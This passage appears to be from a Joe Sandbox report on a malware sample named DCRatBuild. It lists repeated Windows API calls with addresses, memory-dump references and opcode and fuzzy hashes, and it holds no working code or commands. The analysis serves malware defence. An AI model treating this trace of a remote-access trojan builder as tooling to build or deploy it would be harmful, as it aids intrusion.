                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 7f9f0cee4073e9e0f44fa53b006922b4efe0d9a0c9249b3b86543b74c696d0a4
                                  • Instruction ID: f5d6271dc606eeb46aaf8cbeae624673fdb970d519a6de775696ea03378c09a0
                                  • Opcode Fuzzy Hash: 7f9f0cee4073e9e0f44fa53b006922b4efe0d9a0c9249b3b86543b74c696d0a4
                                  • Instruction Fuzzy Hash: 77E06D2164466DEBEB312B7D9C01BBA7B8CFF497B4F154220AF58EA191DE60CC0185E6
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,008D968F,?,?,?,?,00901FA1,000000FF), ref: 008D96EB
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 4a68610612f04046db7e24714a6fc4a1656b246f326661256862c32f88682e38
                                  • Instruction ID: f0ab92d462377ebf67d12497012151c3b5e18176d31c57ce91abf85fcb20c345
                                  • Opcode Fuzzy Hash: 4a68610612f04046db7e24714a6fc4a1656b246f326661256862c32f88682e38
                                  • Instruction Fuzzy Hash: ABF05E30556B058FDB308E24D549792B7E8EB22725F049B1FD0E7936A0EB61A88D9B00
                                  APIs
                                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 008DA4F5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: CloseFind
                                  • String ID:
                                  • API String ID: 1863332320-0
                                  • Opcode ID: 9925d92b0b0a0eb3c7bb6e273ed426bc9f6ff06f185ce1fe75158a71e273e472
                                  • Instruction ID: 9ddad5eca9058e8bdb03f4230c16f0d80a1e1c17e67b760005ccf60d44b64149
                                  • Opcode Fuzzy Hash: 9925d92b0b0a0eb3c7bb6e273ed426bc9f6ff06f185ce1fe75158a71e273e472
                                  • Instruction Fuzzy Hash: 3DF0B431009380AACE221BBC48047D6BBA1FF05331F24CB4AF1F982291C27414859723
                                  APIs
                                  • SetThreadExecutionState.KERNEL32(00000001), ref: 008E06B1
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: ExecutionStateThread
                                  • String ID:
                                  • API String ID: 2211380416-0
                                  • Opcode ID: 0d939acf92c1d3f10f285ed5a6a2bcf066f795904d950c33fad67b0b20269fdc
                                  • Instruction ID: f4550fbdc547bbe0b82b934916e2b699fcd3a4d68de14ae3e7a5816241fc7eff
                                  • Opcode Fuzzy Hash: 0d939acf92c1d3f10f285ed5a6a2bcf066f795904d950c33fad67b0b20269fdc
                                  • Instruction Fuzzy Hash: BBD0CD2071419415CA21336D540A7FE1756EFC3720F084113B00DD3396CB9608C66693
                                  APIs
                                  • GdipAlloc.GDIPLUS(00000010), ref: 008E9D81
                                    • Part of subcall function 008E9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 008E9B30
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                  • String ID:
                                  • API String ID: 1915507550-0
                                  • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                  • Instruction ID: 0af133f5f0576ee13bd287986381ba55fb33ef48d54e768dede8b4bf4142c3c1
                                  • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                  • Instruction Fuzzy Hash: F2D0A73071424CBADF40BE768C0297A7BACFB02310F008065FC48C6141EEF1DE10A262
                                  APIs
                                  • GetFileType.KERNELBASE(000000FF,008D9887), ref: 008D9995
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID:
                                  • API String ID: 3081899298-0
                                  • Opcode ID: a8d70cdc47c33083120693753c97fa6e883bab197bf9a319249069e07eb3fc36
                                  • Instruction ID: 4d64564aee76084d1c8c4067a51affcc516776c6d322bbcfee1f899f1e295f60
                                  • Opcode Fuzzy Hash: a8d70cdc47c33083120693753c97fa6e883bab197bf9a319249069e07eb3fc36
                                  • Instruction Fuzzy Hash: F5D01231021140B58F2146354D190997F65EB83376B38D7A9D0A5C41A1D733C803F541
                                  APIs
                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 008ED43F
                                    • Part of subcall function 008EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008EAC85
                                    • Part of subcall function 008EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008EAC96
                                    • Part of subcall function 008EAC74: IsDialogMessageW.USER32(00010494,?), ref: 008EACAA
                                    • Part of subcall function 008EAC74: TranslateMessage.USER32(?), ref: 008EACB8
                                    • Part of subcall function 008EAC74: DispatchMessageW.USER32(?), ref: 008EACC2
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                  • String ID:
                                  • API String ID: 897784432-0
                                  • Opcode ID: 01361af0951e0b09110b247392bb95bce555b1be2dbcc31356cc44189196ab4d
                                  • Instruction ID: a99541fe726636b714f7d0e74ff581d06e7ed4a60e816e1b2f80f0d1f99f69a2
                                  • Opcode Fuzzy Hash: 01361af0951e0b09110b247392bb95bce555b1be2dbcc31356cc44189196ab4d
                                  • Instruction Fuzzy Hash: 16D09E31258300ABD6152B51CE06F0F7AA6FB88B04F004654B745B40F2CA62AD20FF16
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 2fff82e1b545c43f4d320aec8620e7fb9bda0f85c17db952fbd4677550a13b96
                                  • Instruction ID: f6c9361adc4642d2f55aea01d8634ae3285b91c47cb55a0aaeb5fb4d40a0d436
                                  • Opcode Fuzzy Hash: 2fff82e1b545c43f4d320aec8620e7fb9bda0f85c17db952fbd4677550a13b96
                                  • Instruction Fuzzy Hash: 10B012E526C3427C31086246BD62C3B020CD4C2B14730493AB40DE00C0D8805C4C4832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 10514ecb92fa97d6808f802ce74c7ac5e43cc50dfa9a048364675ffabbc56a63
                                  • Instruction ID: de2f23cddd57870aa22c85454105c7a80a3096ac1e3d00f598eeca9f4fd5de07
                                  • Opcode Fuzzy Hash: 10514ecb92fa97d6808f802ce74c7ac5e43cc50dfa9a048364675ffabbc56a63
                                  • Instruction Fuzzy Hash: 20B012E526C3466C3108A24AAD52D3B024CF4C2B14730443AB40DD01C0D9405C0C0932
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 372282521f116d3b7b1d1903ea624528b94f0aa59c525226f12395511f2de129
                                  • Instruction ID: 189e0541d61ca7b56183c0ec1bb101b2a238bc4b0c541ba451911b844a6260c2
                                  • Opcode Fuzzy Hash: 372282521f116d3b7b1d1903ea624528b94f0aa59c525226f12395511f2de129
                                  • Instruction Fuzzy Hash: 71B012E126C3426C3108A24AAD12D36024CD4C3B14730C42AB40DD02C0D8405C0D0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 1cf6f1b101951b4c4f59aee00f30b75e5de414905f19f89780876e993deb9106
                                  • Instruction ID: c023dc17a609250b1d054dff750361e06dce9ce925f7c21c4674b86770be99d8
                                  • Opcode Fuzzy Hash: 1cf6f1b101951b4c4f59aee00f30b75e5de414905f19f89780876e993deb9106
                                  • Instruction Fuzzy Hash: 46B012E126C3426C310CA24BAE12D36024CD4C2B14730842AB00DD02C0D8405C0E1832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 78f0d932ac3a655f2955f402e34ac429cd5966c768c24086c87bc5dc54dd47fd
                                  • Instruction ID: bef3a3f10077fd701f53461176e59bdf6ec18ca03279d3ee81f476ffe51fe780
                                  • Opcode Fuzzy Hash: 78f0d932ac3a655f2955f402e34ac429cd5966c768c24086c87bc5dc54dd47fd
                                  • Instruction Fuzzy Hash: 0AB012E126C3866C3148A24ABD12D36024CD4C2B14730852AB00DD02C0D8805C8D0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 91935f3af37a3c4d5d75e5f847f46e6ff740ed9557c699560246124efff9c749
                                  • Instruction ID: c786a137fd19ac5553b3068c24289065ae11080660d8ff847e0e9b389e798c0c
                                  • Opcode Fuzzy Hash: 91935f3af37a3c4d5d75e5f847f46e6ff740ed9557c699560246124efff9c749
                                  • Instruction Fuzzy Hash: 36B012F126C3426C3108A24AAD12D37025CD4C3B14730842AB40DD01C0D8405C0C0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 875915e7b06f810e1ef9e3fc5246a042f5f33959e790972e39ce3b42675ed14d
                                  • Instruction ID: 72c71f5b8b0bebc02a5dc2aedc580a71c566acb9c9393894a3422328d37d3b1a
                                  • Opcode Fuzzy Hash: 875915e7b06f810e1ef9e3fc5246a042f5f33959e790972e39ce3b42675ed14d
                                  • Instruction Fuzzy Hash: 87B012F126C3426C3148A24ABD12D37025CD4C3B14730452AB00DD01C0D8805C4C0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 48a7691b76ff3da49307369ce14928511f54b951c6c31186c443b3ddc8e6ecfe
                                  • Instruction ID: 7bd5d11cb168c5bc9fcc53d666eb7a6107c76e3e3485831fac9c23a631c692c0
                                  • Opcode Fuzzy Hash: 48a7691b76ff3da49307369ce14928511f54b951c6c31186c443b3ddc8e6ecfe
                                  • Instruction Fuzzy Hash: 8CB012F126C3426C310CA24BAD12D37025CE4C3B14730442AB00DD01C0D8405C0C0832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 4f5d3ac2a4ec8747dcabae78196239195e76fb8d589cda027ba052b598d6ca35
                                  • Instruction ID: 311ca0d117a4cc06c83e4a8517c3e1229121d51a67f1cf2591d766efa7612b8a
                                  • Opcode Fuzzy Hash: 4f5d3ac2a4ec8747dcabae78196239195e76fb8d589cda027ba052b598d6ca35
                                  • Instruction Fuzzy Hash: 13B012F126C3426C310CA24AAE12D37025CD4C3B14730442AB00DD01C0D8405D0D1832
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008ED8A3
                                    • Part of subcall function 008EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008EDFD6
                                    • Part of subcall function 008EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008EDFE7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true
                                  • Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                  • Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 3c7e06ff114ef4378eca8cf24fcdcdd21f845596d763b3232a57690efec76bb0
                                  • Instruction ID: 2b5019c85b1e29c91343ca95fd993f87ca362ebb4d4c75c94150ff306b82fd3e
